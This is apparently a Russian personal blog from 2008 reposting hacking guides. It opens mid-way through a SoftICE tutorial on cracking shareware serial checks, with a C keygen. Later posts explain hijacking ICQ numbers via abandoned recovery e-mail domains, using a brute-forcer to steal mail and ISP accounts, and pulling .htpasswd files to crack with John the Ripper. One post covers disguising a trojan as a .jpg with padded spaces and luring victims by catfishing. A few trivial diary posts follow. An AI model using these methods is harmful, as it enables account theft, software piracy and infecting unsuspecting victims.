Чтобы посмотреть строчки над ней, нажимайте Ctrl+Up ("стрелка вверх") до тех пор, пока не увидите нижеприведенный кусок кода. Если Вы ничего не понимаете в Ассемблере, я добавил комментарии
которые могут Вам помочь.
RET ; Конец функции
PUSH EBP ; Начало другой функции
MOV EBP, ESP ; ...
SUB ESP, 0000009C ; ...
PUSH ESI ; ...
> LEA EAX, [EBP-34] ; EAX=EBP-34
PUSH EDI ; ...
MOVE ESI, ECX ; ...
PUSH 32 ; Макс. длина строки
> PUSH EAX ; Адрес текстового буфера
PUSH 000003F4 ; Идентиф. управления
PUSH DWORD PTR [ESI+1C] ; Идентиф. окна диалога
CALL [USER32!GetDlgItemTextA] ; Получить текст
Команды PUSH означают сохранение значений для последующего использования. Я пометил важные строчки символом '>'. Глядя на этот код, мы видим, что адрес текстового буфера хранился в
регистре EAX и что EAX был EBP-34h. Поэтому нам стоит взглянуть на EBP-34h:
:d ebp-34
Вы должны были увидеть текст, который вы ввели в диалоговом окне. Теперь мы должны найти место, где Ваш номер сравнивается с реальным серийным номером. Поэтому мы пошагово трассируем программу при помощи F10 до тех пор, пока не встретим что-нибудь о EBP-34. Не пройдет и нескольких секунд, как Вы наткнетесь на следующий код:
> LEA EAX, [EBP+FFFFFF64] ; EAX=EBP-9C
LEA ECX, [EBP-34] ; ECX=EBP-34
PUSH EAX ; Сохраняет EAX
PUSH ECX ; Сохраняет ECX
> CALL 00403DD0 ; Вызывает функцию
ADD ESP, 08 ; Удаляет сохраненную информ.
TEST EAX, EAX ; Проверяет значение функции
JNZ 00402BC0 ; Прыгает, если не "ноль"
Мне кажется, что это выглядит как вызов функции сравнения двух строк. Эта функция работает так: на входе - две строки, на выходе - 0, если они равны и любое другое значание, если не равны.
А зачем программе сравнивать какую-то строчку с той, что Вы ввели в окне диалога? Да затем, чтобы проверить правильность Вашей строки (как Вы, возможно, уже догадались)! Так-так, значит этот номер скрывался по адресу [EBP+FFFFFF64]? SoftICE не совсем корректно работает с отрицательными числами и поэтому настоящий адрес следует посчитать:
100000000 - FFFFFF64=9C
Вы можете сделать это вычисление прямо в SoftICE:
:? 0-FFFFFF64
Число 100000000 слишком велико для SoftICE, а вычитание из 0 дает тот же самый результат.
Наконец пришло время взглянуть, что же скрывается по адресу EBP-9C...
:d ebp-9c
В окне данных SoftICE Вы видите длинную строчку цифр - это серийный номер! Но Вы помните, что я говорил Вам раньше? Два типа регистрации - два разных серийных номера. Поэтому после того, как
Вы записали на бумажечку первый серийный номер, продолжайте трассировать программу при помощи F10. Мы дошли до следующего куска кода:
> LEA EAX, [EBP-68] ; EAX=EBP-68
LEA ECX, [EBP-34] ; ECX=EBP-34
PUSH EAX ; Сохраняет EAX
PUSH ECX ; Сохраняет ECX
> CALL 00403DD0 ; Снова вызывает функцию
ADD ESP, 08 ; Удаляет сохраненную информацию
TEST EAX, EAX ; Проверяет значение функции
JNZ 00402BFF ; Прыгает если не "ноль"
И что Вы видите по адресу EBP-68? Второй серийный номер!
:d ebp-68
Вот и все... Я надеюсь, что у Вас все получилось как доктор прописал?=)

3.2 Command Line 95 - легкая регистрация "имя-код", создание генератора ключей
=================================================================
Это программа - хороший пример, с легким алгоритмом генерации кода.
3.1.1 "Обследование"
====================
Вы осмотрели программу и увидели, что это 32-битное приложение, требующее имя и код в окне регистрации. Поехали!

3.1.2 Прерывание программы
==========================

Мы поступаем так же, как и с Task Lock'ом - ставим брейкпоинты. Можно даже поставить сразу два брейкпоинта на наиболее возможные функции: GetWindowTextA и GetDlgItemTextA. Нажмите Ctrl-D, чтобы
вызвать отладчик и наберите в окне команд:
:bpx getwindowtexta
:bpx getdlgitemtexta
Теперь возвращайтесь в прерванную программу, идите в окно регистрации и вводите имя и какой-нибудь номер (обыкновенное целое число - это наиболее вероятный код). Я написал примерно
следующее:
Name: ED!SON '96
Code: 12345
Программа остановилась на GetDlgItemTextA. Так же, как и в случае с Task Lock'ом, мы нажимаем F11 чтобы вернуться в вызывающюю функцию. Просматриваем окно кода при помощи Ctrl+Up. Вызов
функции выглядит так:
MOV ESI, [ESP+0C]
PUSH 1E ; Максимальная длина
PUSH 0040A680 ; Адрес буфера
PUSH 000003ED ; Идентификатор управления
PUSH ESI ; Идентификатор окна диалога
CALL [User32!GetDlgItemTextA]
Число 40A680 кажется нам интересным, поэтому мы проверяем этот адрес:
:d 40a680
Что же видно в окне данных, как не имя, которое мы ввели?=) А теперь взглянем на кусок кода под вышеприведенным:
PUSH 00 ; (не интересно)
PUSH 00 ; (не интересно)
PUSH 000003F6 ; Идентификатор управления
MOV EDI, 0040A680 ; Адрес буфера
PUSH ESI ; Идентификатор окна диалога
CALL [User32!GetDlgItemInt]
Функция GetDlgItemInt похожа на GetDlgItemTextA, но возвращает не строку, а целое число. Она возвращает его в регистре EAX, поэтому мы трассируем этот код (F10) и смотрим, что же у нас появилось в окне регистров после вызова функции... В моем случае оно выглядит так:
EAX=00003039
А что такое шестнадцатеричное 3039? Наберем:
:? 3039
И получим следующее:
00003039 0000012345 "09"
^ hex ^ dec ^ ascii
Как Вы видите (и, возможно, уже догадались) это код, который Вы ввели в диалоговом окне. Ok, что теперь? Посмотрим дальше:
MOV [0040A548], EAX ; Сохраняет рег. код
MOV EDX, EAX ; А также помещает его в EDX

3.1.3 Подсчитывание регистрационного кода
=========================================
Мы достигли места, где подсчитывается реальный регистрационный код!
MOV ECX, FFFFFFFF ; Эти строчки подсчитывают
SUB EAX, EAX ; длину строки
REPNZ SCASB ; .
NOT ECX ; .
DEC ECX ; ECX теперь содержит длину
MOVSX EAX, BYTE PTR [0040A680] ; Получ. байт по адр. 40A680h
IMUL ECX, EAX ; ECX=ECX * EAX
SHL ECX, 0A ; Сдвиг влево на 0Ah бит
ADD ECX, 0002F8CC ; Добавляет 2F8CC к результату
MOV [0040A664], ECX
...И где он проверяется
CMP ECX, EDX ; Сравнивает числа
JZ 00402DA6 ; Прыгает, если равны
Когда Вы дотрассировали до сравнения чисел, Вы можете посмотреть,
каким должен был быть Ваш РЕАЛЬНЫЙ регистрационный код:
:? ecx
В моем случае это дало:
000DC0CC 0000901324
То есть, правильный код для меня: 901324.
Нажмем F5 или Ctrl-D чтобы вернуться в программу и попробуем еще раз, но на этот раз с правильным кодом (в десятичной форме).Работает!
4. СОЗДАНИЕ ГЕНЕРАТОРА КЛЮЧЕЙ ДЛЯ COMMAND LINE 95
=================================================
Взглянем на алгоритм генерации кода и попробуем перевести его на язык Си. Вот очень простая формула, по которой подсчитывается ключ:
code=((uppercase_first_char * length_of_string) << 0x0A) + 0x2f8cc;
Замечание #1: Не следует забывать, что все символы в окне ввода имени были приведены к верхнему регистру, поэтому мы должны сделать то же.
Замечание #2: "<< 0x0A" означает "умножние на 2 в степени 10"
Целиком программа на Си выглядит так:
#include
#include
int main()
{
unsigned long code;
unsigned char buffer[0x1e];
printf("CommandLine95 Keymaker by ED!SON '96\n");
printf("Enter name: ");
gets(buffer);
strupr(buffer);
code=( ((unsigned long)buffer[0] *
(unsigned long)strlen(buffer))
<< 0x0A) + 0x2f8cc;
printf("Your tt is: %lu", code);
return 0;
}
Приятных сновидений!
B. СИНТАКСИС НЕКОТОРЫХ ФУНКЦИЙ
==============================
Вам будет легче понять, как вызываются функции, о которых мы говорили, если Вы будете знать их описания (декларации):
int GetWindowText(int windowhandle, char *buffer, int maxlen);
int GetDlgItemText(int dialoghandle, int controlid, char *buffer,
int maxlen);
int GetDlgItemInt(int dialoghandle, int controlid, int *flag, int type);
Если Вам нужна более подробная информация, посмотрите в руководстве программиста Windows/Win32.

C. ГДЕ НАЙТИ ПРОГРАММЫ
======================
ПРОГРАММЫ ДЛЯ ВЗЛОМА

Вложение: 3655968_xxx.doc


Ну и опять про в3ломы!

Среда, 20 Февраля 2008 г. 15:57 + в цитатник
думаю, не надо пояснять, зачем нужно угонять Асю. Последнее время это становится тем более актуальным, так как сейчас количество знаков в номере Аськи перевалило за 10. Так что если ты по-честному зарегистрируешься, то получишь неудобоваримое множество циферок, которое и тебе, и твоим друзьям запоминать будет очень неудобно. Да и не круто хакеру с длинным номером сидеть (если ты, конечно, не конспирируешься). Самые престижные номера, как известно, состоят из 6 цифр. На черном сетевом рынке цены на них, в зависимости от последовательности цифр, исчисляются десятками, а то и сотнями долларов. Чем более он старый, начинающийся, например, с единицы, двойки и т.д., тем он круче. Далее идут семизначные, менее престижные, зато более дешевые. С недавних пор в разряд часто угоняемых попали и восьмизначные номера. Если хочешь узнать, сколько такие асечные пираты берут денег за номера, введи в поисковой системе что-нибудь вроде «короткие номера ICQ» и наверняка увидишь немало ссылок на сайты, где ими торгуют. Я вовсе не призываю тебя зарабатывать таким угоном деньги, а даже наоборот - крайне не рекомендую этого делать. Хотя это и не считается таким уж серьезным электронным преступлением, все же несколько человек за историю существования системы ICQ понесли уголовную ответственность (вроде бы не в России) за угон и торговлю номерами. Так что можешь угнать парочку номеров для себя, но не наглей. И сразу оговорюсь - не пытайся угнать какой-нибудь сильно крутой номер, вроде тех, где все шесть цифр - одинаковые, или самый первый, так как они все уже давно угнаны (позже объясню, почему не получится угнать) и, что примечательно, зарегистрированы на жителей России (есть повод гордиться!), Украины и других стран бывшего СССР, а также Израиля и Китая. Это при том, что в этих странах (кроме Израиля) Ася стала распространяться намного позже, чем оказались законно занятыми все шестизначные номера. Есть над чем задуматься :).
УГНАТЬ ЗА 60 СЕКУНД
Угон асечных номеров по своей сути не является взломом, это скорее ловля на дурака. Все основано на том, что Ася может высылать по запросу «забытый» пароль пользователю на тот ящик, который он указал при регистрации. Причем, если даже потом изменить этот адрес, то пароль все равно будет отсылаться только на тот, который был указан сначала, даже если его уже не существует. Вот именно этим нам и остается воспользоваться. То есть найти такие короткие номера, в которых указан почтовый адрес, которого не существует. Или же получить доступ к существующему мыльнику и спереть высланный на него пароль. Легче всего это сделать, если мыльник халявный, вроде mail.com. В таких почтовых системах тоже есть напоминалки паролей, но это тема отдельной статьи.
Некоторые пользователи вообще вводят в качестве почтового адреса какой-нибудь левый, заведомо не существующий адрес с несуществующим доменом. Например: qwerty@qwerty.com, считая, что это оригинально, остроумно и никто никогда такой адрес не сделает (наивные).
Если домен существует, но адреса такого нет, тогда ничего не стоит зарегистрировать на том же домене такой ящик. Например, если это lamer@mail.com, идем, соответственно, на www.mail.com, проверяем, существует ли такой адрес, и если нет (ведь такие бесплатные почтовые системы периодически стирают неактивные адреса), то просто создаем его и заставляем ICQ «напомнить» нам пароль от Аси, в которой этот мыльник указан. Пароль придет в течение суток. Хотя, если этот адрес указан уже позже, а при регистрации был указан другой, то пароль, скорее всего, не придет. Но попытаться стоит. Если адрес был указан на домене какой-нибудь конторы, которая выделяет адреса только для сотрудников, тогда тоже облом. Можно, конечно, еще попытаться достать пароль и от мыльника.
Если же не существует домен, как в случае с qwerty@qwerty.com, тогда нужно зарегистрировать домен www.qwerty.com и создать на нем же ящик с именем qwerty@qwerty.com, а далее «напомнить» пароль на него. Тут ты, конечно же, скажешь: что, мол, мне так для каждого адреса домен регистрировать? Да за него ж еще и платить надо! Ну уж нет, братан, тут ты будешь не прав. Сходи-ка, например, на www.doteasy.com - эта система предлагает любому желающему создать домен второго уровня совершенно на халяву, с учетом только того, что тебе нужно будет регулярно обновлять содержимое сайта и что на сайте будет хоть какая-нибудь регулярная посещаемость (маленькая ложка дегтя: за домен надо платить 35 баксов, но деньги берутся не сразу - если за месяц привести двух рефералов, то лавэ твои останутся в целости и сохранности; браться за такой хак надо, только если имеется хотя бы один валидный номер кредитки, а наличие на ней денег не обязательно - прим. ред.). Но нам-то в данном случае нужен не сайт, а всего лишь ящик, да и то на время. Так что заводи там нужный тебе для угона домен, регистрация его может занять от нескольких дней до недели, прежде чем ты сможешь разместить ящик. Можно поискать и другие похожие системы, если в этой тебя что-то не устроит (может они уже изменили условия, пока готовился этот номер). Кое-что о них можно найти тут - http://sazmoney.narod.ru/web/domain.htm - или введя запрос в поисковом сервере вроде «бесплатные домены». Есть системы, которые позволяют создать только мыльник, в котором и имя, и домен будет таким, как ты захочешь. Нужно только поискать.
ЛОЖКА МЕДА В БОЧКЕ ДЕГТЯ
Поиск такого короткого номера, да еще и чтобы был подходящий мыльник, которого либо не существует, либо к которому можно как-то получить доступ, - процесс очень длительный и жрущий много часов по диал-апу. Тут лучше всего, если у тебя выделенка или, на крайняк, анлима по диал-апу - тогда этот процесс становится более дешевым, спокойным и ненавязчивым.
Можно долго перебирать номера от балды вручную, но гораздо логичней автоматизировать процесс и, соответственно, ускорить его в несколько раз. Есть такая прога - Assault (http://asechka.ru/downloads/assault3d.zip). Она перебирает заданный тобой диапазон номеров (например, от 100000 до 999999) на предмет наличия primary-мыльников, на которые система ICQ высылает забытые пароли. Так вот, задав ей определенный диапазон адресов и запустив на несколько часов, можно получить список мыл (прога сохраняет все в лог), которые останется только проверить на живучесть. А это уже можно сделать с помощью программы Advanced Maillist Verify (http://www.mailutilities.com/amv/amv.zip). В нее останется ввести любой из найденных адресов и проверить, существует ли он. Assault работает с довольно неплохой скоростью даже на диал-апе, примерно по одному адресу в секунду. Можешь прикинуть, сколько понадобится времени для сканирования желаемого диапазона адресов. Да и проверка их на живучесть тоже потребует некоторого времени. У меня вот ушло всего пару вечеров по несколько часов на поиски, чтобы получить парочку рулезных номеров, и еще неделя, чтобы зарегить домены и получить пароли от них.
УГНАЛИ?
Если твой короткий нажитый непосильным трудом номер кто-то умудрился скомуниздить - вернуть его можно, если ты помнишь тот мыльник, на который высылался пароль при угоне. Может быть потребуется снова создать такой домен и адрес, но в любом случае, так как Ася высылает номер только на тот адрес, который был введен при регистрации, и при угоне пароль успешно был на него выслан, то это прокатит и в этот раз. Чуешь, чем чревата покупка номера у пиратов? Если они окажутся недобросовестными, то они запросто вернут себе обратно купленный тобой номер, чтобы продать его еще кому-нибудь, а на любые претензии ответят: «Ну угнали, ну бывает, а мы-то тут причем?». Плакал тогда твой номерок и твои денежки. Вот почему лучше погиморроиться и угнать самому. Да и будет чем потом гордиться.
Чтобы избежать того, чтобы кто-то угнал твой номер (это, кстати, касается любого случая, даже если ты честный обладатель номера и не хочешь ничего ни у кого угонять), нужно принять следующие меры предосторожности. В первую очередь сотри и никогда не вводи почтовый адрес, особенно несуществующий или с халявной мыльницы. Если Ася свежеугнанная, обязательно сотри тот мыльник, который в ней был, а также всю другую инфу о бывшем пользователе. Обязательно смени пароль (знаю, что ты это и так понимаешь, но на всякий случай напоминаю). Первое время вообще не вводи ничего в user info и постарайся, чтобы мыльник, который ты создал для угона, продержался как можно больше. Убери из настроек Аси авторизацию без твоего согласия и установи опцию, чтобы другим неавторизованным пользователям не был виден твой текущий online/offline-статус. Это сделает тебя невидимым для бывшего владельца и, если он не помнит, какой адрес он вводил при регистрации, не позволит вернуть свой номер обратно. Через некоторое время ты, конечно же, сможешь ввести какую-нибудь инфу, вроде своего ника. Но никогда, запомни, НИКОГДА не вводи ничего в поле e-mail. А также оставь опцию, чтобы незнакомые не могли добавлять тебя в свой контактный лист и наблюдать твой текущий статус. Надеюсь, не нужно напоминать, что нельзя вводить свой физический домашний адрес, телефон и другую инфу, по которой тебя можно найти, лучше тогда повесь себе на входную дверь с внешней стороны ключ от ее замка и надпись «Добро пожаловать» :). Все эти нехитрые действия уберегут твой номер от посягательств других таких же, как и ты, умников.
ЭПИЛОГ
Как видишь, чтобы стать обладателем модного номера, вовсе не надо что-то ломать. Достаточно найти банального лоха, который ничего не знает о тех простых правилах защиты, о которых я тебе рассказал. Только вот лохов с такими номерами становится все меньше и меньше, а желающих обзавестись коротким номером становится все больше и больше. Особенно преуспевают пираты, у которых это средство заработка. Угнанные однажды номера второй раз угнать уже практически невозможно. Исходя из всего этого, поторопись, если хочешь стать одним из счастливых обладателей короткого номера. Да и сам смотри не облажайся и не лишись собственного номера.
А вообще, нехорошо все это! Никогда не угоняй номера и используй эту инфу только в целях защиты! :)




Автор:Елка and ТаксиН

HTTP-Что это такое?

Среда, 20 Февраля 2008 г. 15:54 + в цитатник
Ну что же здарова кул-хакЁр!!!Ты ещё не кул-хакер???Ты ещё не натянул сервак http://www.whitehouse.gov/??? Ты ещё даже не научился выкидывать ЛОМОВ из чата??? Ну так что же, не беда, этому ты научишься позже...
Вот задаёшься ты вопросом: как же этот кул-хакер взломал твоё вэб мыло и от твоего имени рассылает коников и вирей??? Ну ничего сегодня мы тебе расскажем как это делается самым простым способом. Для этого тебе не понадобятся какие-нибудь углубленные знания генной инженерии и знания азбуки Морзе, а так же не понадобится понятие принципа работы электронного розгонятиля протонов в вакууме.
Ну так вот, сначала сливаем себе рулезную прогу под названием Xavior v1.0 Beta7.Инсталим,там ничего сложного и сверхъестественного, вот у нас уже есть оружие начинающего Хакера.
Вот запустил ты енту прогу на своей тачке и видишь уродство и говоришь себе: "Блин что это за убожество, отстой, ни картинок тебе, ни нормального ХЕЛПА..." (у меня так и было...=)Но всё пока ты не понимаешь ценности этой вещи. Ну вот например я тебе напишу неполный список того что ты можешь сделать с помощью этой проги:
подобрать пароль к мылу своего заклятого врага и поотсылать от его мыла выря или лошадку(ну тока не Прижевальского, ну да ты сам знаешь...)
поломать ТЕХ. ПОДДЕРЖКУ своего ПРОВА и раздобыть себе ХАЛЯВНЫЙ АККАУНТИК и делать далее усё что твоей хацкерской душеньке угодно (даже продать его=)
раздобыть себе АККАУНТИК к ПОРНУШКЕ и даже если ты таким не увлекаешься (может ты этакий КАЗАНОВА и на этих баб, тем более в голом виде уже смотреть не можешь, тошнит=), то есть много людей готовых за такой АККАУНТИК сделать ТтАаКкОоЕе!!!...уже проверенно...=)))
Ну и многое другое, надеюсь ты сам понимаешь...
Ну хорошо приступим к описанию самой проги. Вот запустил ты её и смотришь...а что же тут делать, а вот сейчас я это и объясню...
Перед тобой менюшка с 6 закладками, о каждой по порядку:
1)Information-это закладка в которой есть такие опции как:
Usernames File-енто файл в котором задаются ЛОГИНЫ
Passes File-это файло в котром задаются ПАРОЛИ
Currently Position Filename-это файл с расширением *.xvp. Вот это и есть хорошая фишка этой програмульки, это значит что ты можешь долбать спокойно какой-то мыл и в нём сложный пасс и требует долгого и упорного долбления, а тут как раз время ночной халявы кончается=).И что делать ты думаешь, а ничего не надо, будет всё снова начинать!!! Прога запомнит позицию долбления и потом начнёт с неё.
Далее идёт status, то есть online или offline (где-то я уже это видел, вот тока никак не припомню=).В правом углу идёт усякая ИНФА типа номера сессии, попыток в секунду, оставшееся время и т.п. Внизу есть 2 окна: первое-всякая инфа ненужная, позиция долбинга (во как сказанул=),второе-окно это списки ЛОГИНОВ и ПАССОВ которые прошли или заканали...кто как называет.
2)закладка General Options-это собственно говоря усе опции, а то есть:
Target(Adress/IP) - ну это адресок того, что собираемся долбить. Port-это порт по которому долбится будем, по умолчанию 80(HTTP)
Directory/File (For WEB servers) - ну а это папка на серваке куда долбится будем, по умолчанию /secure
-Program to masqurade as...-это под что прога шифруется
Number оf Sesions-это кол-во сессий
Далее надо поставить галочку на Auto Save Position every 100 attemps. Потом идёт выбор куда же именно на серваке долбится будем, то есть:
Standart HTTP basic Authentication - это стандартная проверка ЛОГИН\ПАССА
CGI-BIN/POST - это определение ПАССА\ЛОГИНА по CGI и в ФОРМАХ
Scripting-это по скрипту
И вот последнее в этой закладке:
Checking Method-метод проверки=):
Loop throught passwrds file once for every user-это прыгать по ПАССАМ на 1 ЛОГИН,потом на 2 ЛОГИН и опять прыжки по ПАССАМ
Make passwrd equal to username-это как я понимаю прога берёт 1 пасс и прыгает по ЛОГИНАМ,вроде так
Brute Force all character combinations-вот это самая рульная вещь,тобиш БРУТ ФОРС или подбор по буквам
3) 3акладка Scripting-установки скрипта.
4) 3акладка Mutators-это мутаторы с помощью их можно например сказать проге что-бы юзала ПАССЫ и ЛОГИНЫ только в маленьких буквах.
5) 3акладка Brute Forcing-установки БРУТ ФОРСА или наборы символов.
6) 3акладка Advanced - вот нужная в натуре вещь, поподробней:
Use WWW Proxy-Web PROXY adress-Port - ну енто использование ПРОКСИ сервака, вещь архинужная и архиважная! Но вот пока не могу понять почему же по умолчанию она отключена %-Е
Sleep between multiple sessions... - пока сам понять не могу нафига оно надо...?
Minimize To Tray - без комментариев...
Use timeouts - это время отдыха проги между долбингом,советую отключить вообще
Log Accepted Names/Passes to "accepted.log"-енто записывать удачные ЛОГИНЫ и ПАССЫ в этот файл.
Ну да ладно этой усей инфы,я лучше расскажу всё на примере: вот например есть ПРОВ и я знаю ЛОГИН (если у юзверя есть мыло, то адрес до @ и есть как всегда ЛОГИНОМ) и знаю что пасс у него состоит где-то из 6 знаков. Мутим раз - берём Melco$oft Notepad-и пишем там ЛОГИН, например superlamer, то бишь мыло у него будет примерно такое: superlames@megaprov.com. Дальше берём любой генератор паролей и задаём ему сгенерировать 1000 паролей с большими и маленькими буквами и с цифрами...есть??? Молодец!!!
Мутим два - осталось настроить прогу и в путь!!! Значит ставим в проге тот именно файл с ЛОГИНОМ который мы там писали (superlamer),подставляем файл с ПАССАМИ которые нам добротно сгенерировала прога-генератор паролей. Дальше ставим адрес, например http://www.users.superprov.com/ отключаем таймаут, включаем прокси (даже если у тебя уже стоит ПРОКСИ, всё равно включи как говорится "Оперативкой КОМП не испортишь!"=), ставим галочку на log accepted...указываем файло для сохранения попыток, что-бы не начинать при обрыве связи всё с начала, и совсем забыл (БООТ сектор у меня дырявый видно=) поставим ГАЛКУ в закладке General Options на Auto Save Posichion every 100 attempts!!!
Всё, ты готов к ворованию аккаунта. Идём в меню Actions (это там вверху) и жмём GO!!!
В заключении хочу сказать что если усё сделано правильно, то должно получится... но надо помнить что разные серваки построены на разный ОС и это может и не заканать. И ещё надо всегда помнить что: ЖАДНОСТЬ ХАКЕРА СГУБИЛА!!! Так что вперёд к новым барьерам (аккаунтам, мылам и т.п.)
Удачного тебе ХАКА мой маленький электронный вор!!!=)
 (100x100, 29Kb)

Брутерство

Среда, 20 Февраля 2008 г. 15:51 + в цитатник
Шаг (1)
Идите сами знаете куда и возьмите там работающий пароль к сайту который вы хотите взломать.
Шаг (2)
Затем вы должны войти на этот xxx сайт в "members section" ну например так www.xxxsite.com/members/index.html или типа этого..
Шаг (3)
Удалите слово index.html и наберите .htaccess например: www.xxxsite.com/members/.htaccess
Если вам повезет вы получите нижеследующее:
AuthUserFile /www/xxxsite/members/.htpasswd <- место где лежит файл с паролями.
AuthGroupFile /dev/null <- место где лежит groupfile
AuthName Members Only Directory <-место где находится popup который просит вас ввести password/login
AuthType Basic <- другие типы авторизации apache btw.

Limit GET POST PUT <-
require valid-user <-

Но реально вся эта лабуда не нужна для начала если .htaccess прошел сразу вместо него пишите .htpasswd и все OK.
Шаг (4), найдите passwordfile ( .htpasswd)
Шаг (5), удалите .htaccess и вместо наберите ( .htpasswd )
например :www.xxxsite.com/members/.htpasswd. После этого вы получите passwordlist. Пароли будут зашифрованы. Это будет выглядеть так:
ocean:q8ERltHeoxRG.
sydgator:458mLs4euQHwo
demi1:o7ad9QtJIklTY
demi2:Fx93hhGP/oTs6Y
233244:ZXEHRGfdsL9E346

Первое слово - логин , остальное после : пароли

Шаг (6)
Чтобы раскодировать пароли надо сначала скачать декодер ,например"John the ripper" .
John the ripper расшифрует пароли на это уйдет примерно. ( 15000/сек. на 166mmx)

Шаг (7), Сохраните полученные логины и пароли
Шаг (8), Разархивируйте John The Ripper и наберите:
( предварительно поместив текстовый файл в директорию где лежит ripper)

John xxx.txt -single (Это самый быстрый способ и самый простой алгоритм.)
John xxx.txt -wordfile:password.lst (Это посложней)
John xxx.txt -incremental (Это самый сложный алгоритм и занимает время зато самый надежный)
Текст представлен только для учебных целей.Не используйте его на практике. Использование может повлечь за собой проблемы.

В3ломы

Среда, 20 Февраля 2008 г. 15:44 + в цитатник
В этой статье я расскажу как можно присвоить себе чужой UIN (UIN - номер АСКИ).
Есть много способов заполучить заветный UIN.
Способ 1
В этом способе Вам нужно залезть в компьютер ламера, если не умеете то советую прочитать статью "Халявный интернет". Я таким способом пользуюсь очень редко. Так вот залазишь ты на комп к жертве и заходишь по такому пути C:\Program Files\ICQ и видишь там такую папку 200b (в разных версия Аськи папка разная например 99b и т.д.), теперь заходим в неё и видим например такое 100100100.dat вот за этим мы суда и залезли. Копируем этот файл к себе на винт и запускаем такую прогу ICQ Information v 1.3. Там Вам будет все понятно… В итоге Вы получаете номер Аськи 100100100 и пароль… И все… Не забудьте только потом пароль поменять.
Способ 2
Ну вот лень так по кампам лазить! Да и неизвестно будет ли Аська вообще на кампе стоять! Будет ли она прикольная, а не 4176381! Наверное Вы такое подумали. Ну ладно расскажу другой способ. Для этого запускаем Аську и запускаем поиск пользователей ICQ. Набираем такой UIN 100100100 и видим что зарегистрирован такой пользователь как Lamer, а почта у него asd@mail.ru (или какая другая тупая почта). Идем на сайт www.mail.ru и пробуем зарегистрировать такой емайл… Получилось? Если да то переходим на сайт www.icq.com/password и там вводим UIN а Вашу новую почту и все через пару минут пароль Ваш… Если повезет то такую почту напишет не один, а двадцать человек и все их UIN'ы будут Ваши! А че голову морочить попробуйте найти чела кторый Вашу почту написал, все может бытьJ
А если не получилось зарегистрировать такую почту что делать? - Скажите Вы.
Ну что тогда качайте маил бомбер и бомбите эту почту. Её сразу закроют, а Вы зарегистрируйте её опять и все…
Способ 3
Самый я считаю нудный способ… Регистрируетесь например под именем Марина Петрова, пишите о себе 90 60 90, и вступайте в контакт с жертвой. Если он захочет взглянуть на Вашу фотку то скачайте ее с какого ни будь сайта и покажите ему. Потом заохайте типа У ВАС АСЬКА СЛОМАЛАСЬ и попросите еог выслать Вам файл с расширением .dat. А дальше сами знаете, что с ним делать! Только помните этот способ прокатит только в том случае если жертва полный ЛАМЕР!!! А да чуть не забыл… Если будите посылать фотку то можно к ней (к фотке) прикрепить трояна! Или первую отправить и скажите "Вот у меня тут еще одна есть, посмотри", он конечно согласиться, а Вы допустим берете трояна Смерть Ламера 2.6, пуская сервер называется sexgirl.exe. И видим, что у нашей фотки стоит расширение exe, что же делать? А делаем мы следующие, после слова sexgirl мы ставим точку и дописываем jpg, то есть расширение фотографии, а после jpg ставим много пробелов, в конце концов получается такое имя sexgirl.jpg………………exe (только место точек пробелы) и отправляем это ламеру… Он запускает этот файл и доступ к его кампу открыт! Все это мы проделали с пробелом для того что бы не было видно расширение трояна. Ведь когда получают файлы по Аське если имя длинное до его все не видно. Этим самым мы прячем реально расширение файла!

Привет читайте

Воскресенье, 10 Февраля 2008 г. 21:06 + в цитатник
В колонках играет - LP
Настроение сейчас - Норм

Ну пишу просто так хочу посмотреть что это такое

Флуд

Воскресенье, 10 Февраля 2008 г. 21:01 + в цитатник
Привет всем седящем в дневе
Рубрики:  Флуд

Без заголовка

Пятница, 01 Февраля 2008 г. 14:53 + в цитатник
Привет всем сдесь пофлудим!!

Аудио-запись: дуран дуран

Музыка

Пятница, 01 Февраля 2008 г. 14:50 (ссылка) +поставить ссылку

Комментарии (1)Комментировать

Всем посетителям

Пятница, 01 Февраля 2008 г. 14:37 + в цитатник
Привет всем

Дневник TaKCuH

Пятница, 01 Февраля 2008 г. 14:30 + в цитатник
Дневник начинающего Брут-ера


Поиск сообщений в TaKCuH
Страницы: [1] Календарь